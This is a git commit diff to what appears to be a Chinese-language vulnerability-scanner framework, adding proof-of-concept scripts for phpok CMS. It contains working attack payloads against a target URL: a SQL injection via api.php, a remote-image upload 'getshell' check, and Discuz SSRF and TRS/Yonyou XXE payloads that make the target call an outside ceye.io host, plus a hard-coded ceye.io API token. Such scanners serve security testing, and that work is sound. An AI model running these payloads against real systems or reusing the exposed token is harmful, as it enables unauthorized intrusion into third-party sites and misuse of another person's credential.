add phpok poc

2017-12-25 16:12:12 +08:00
parent ad356577f6
commit 2db3f23a8e
7 changed files with 89 additions and 6 deletions
--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -9,6 +9,8 @@ description: 包含所有cms漏洞类型，封装成一个模块

 #phpok vulns
 from cms.phpok.phpok_res_action_control_filedownload import phpok_res_action_control_filedownload_BaseVerify
+from cms.phpok.phpok_api_param_sqli import phpok_api_param_sqli_BaseVerify
+from cms.phpok.phpok_remote_image_getshell import phpok_remote_image_getshell_BaseVerify

 #typecho vuls
 from cms.typecho.typecho_install_code_exec import typecho_install_code_exec_BaseVerify
--- a/cms/discuz/discuz_forum_message_ssrf.py
+++ b/cms/discuz/discuz_forum_message_ssrf.py
@@ -25,11 +25,11 @@ class discuz_forum_message_ssrf_BaseVerify:
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
-        payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ea268b12.dnslog.link/"+md5_str+".jpg[/img]&formhash=09cec465"
+        payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://dx3hbm.ceye.io/"+md5_str+".jpg[/img]&formhash=09cec465"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
-            eye_url = "http://admin.dnslog.link/api/web/ea268b12/ea268b12/"
+            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
            time.sleep(6)
            reqr = requests.get(eye_url, timeout=10, verify=False)
            if md5_str in reqr.text:
--- a/cms/phpok/phpok_api_param_sqli.py
+++ b/cms/phpok/phpok_api_param_sqli.py
@@ -0,0 +1,35 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: phpok api.php SQL注入漏洞
+referer: http://www.moonsec.com/post-677.html
+author: Lucifer
+description: api_control文件存在SQL注入。
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class phpok_api_param_sqli_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payload = "/api.php?c=api&f=phpok&id=_total&param[pid]=42&param[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23"
+        vulnurl = self.url + payload
+        try:
+            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
+                cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = phpok_api_param_sqli_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/cms/phpok/phpok_remote_image_getshell.py
+++ b/cms/phpok/phpok_remote_image_getshell.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: phpok remote_image getshell漏洞
+referer: http://0day5.com/archives/1820/
+author: Lucifer
+description: remote_image_f函数没对远程文件后缀做检查直接保存到本地。
+'''
+import sys
+import time
+import hashlib
+import datetime
+import requests
+import warnings
+from termcolor import cprint
+
+class phpok_remote_image_getshell_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        time_stamp = time.mktime(datetime.datetime.now().timetuple())
+        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
+        md5_str = m.hexdigest()
+        payload = "/index.php?c=ueditor&f=remote_image&upfile=http://dx3hbm.ceye.io/" + md5_str
+        vulnurl = self.url + payload
+        try:
+            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
+            time.sleep(6)
+            reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
+            if md5_str in reqr.text:
+                cprint("[+]存在phpok remote_image getshell漏洞...(高危)\tpayload: "+vulnurl, "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = phpok_remote_image_getshell_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/cms/trs/trs_infogate_xxe.py
+++ b/cms/trs/trs_infogate_xxe.py
@@ -28,10 +28,10 @@ class trs_infogate_xxe_BaseVerify:
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
-        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ea268b12.dnslog.link/'+md5_str+'">%remote;]>'
+        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://dx3hbm.ceye.io/'+md5_str+'">%remote;]>'
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
-            eye_url = "http://admin.dnslog.link/api/web/ea268b12/ea268b12/"
+            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
            time.sleep(6)
            reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
            if md5_str in reqr.text:
--- a/cms/yonyou/yonyou_a8_personService_xxe.py
+++ b/cms/yonyou/yonyou_a8_personService_xxe.py
@@ -30,10 +30,10 @@ class yonyou_a8_personService_xxe_BaseVerify:
        time_stamp = time.mktime(datetime.datetime.now().timetuple())
        m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
        md5_str = m.hexdigest()
-        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ea268b12.dnslog.link/'+md5_str+'">%remote;]>'
+        post_data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://dx3hbm.ceye.io/'+md5_str+'">%remote;]>'
        try:
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
-            eye_url = "http://admin.dnslog.link/api/web/ea268b12/ea268b12/"
+            eye_url = "http://api.ceye.io/v1/records?token=c04665a158430a100ed655f9c710e597&type=request"
            time.sleep(6)
            reqr = requests.get(eye_url, timeout=10, verify=False)
            if md5_str in reqr.text:
--- a/pocdb.py
+++ b/pocdb.py
@@ -25,6 +25,8 @@ class pocdb_pocs:
        }
        self.cmspocdict = {
            "phpok res_action_control.php 任意文件下载(需要cookies文件)":phpok_res_action_control_filedownload_BaseVerify(url),
+            "phpok api.php SQL注入漏洞":phpok_api_param_sqli_BaseVerify(url),
+            "phpok remote_image getshell漏洞":phpok_remote_image_getshell_BaseVerify(url),
            "jeecg 重置admin密码":jeecg_pwd_reset_BaseVerify(url),
            "typecho install.php反序列化命令执行":typecho_install_code_exec_BaseVerify(url),
            "Dotnetcms(风讯cms)SQL注入漏洞":foosun_City_ajax_sqli_BaseVerify(url),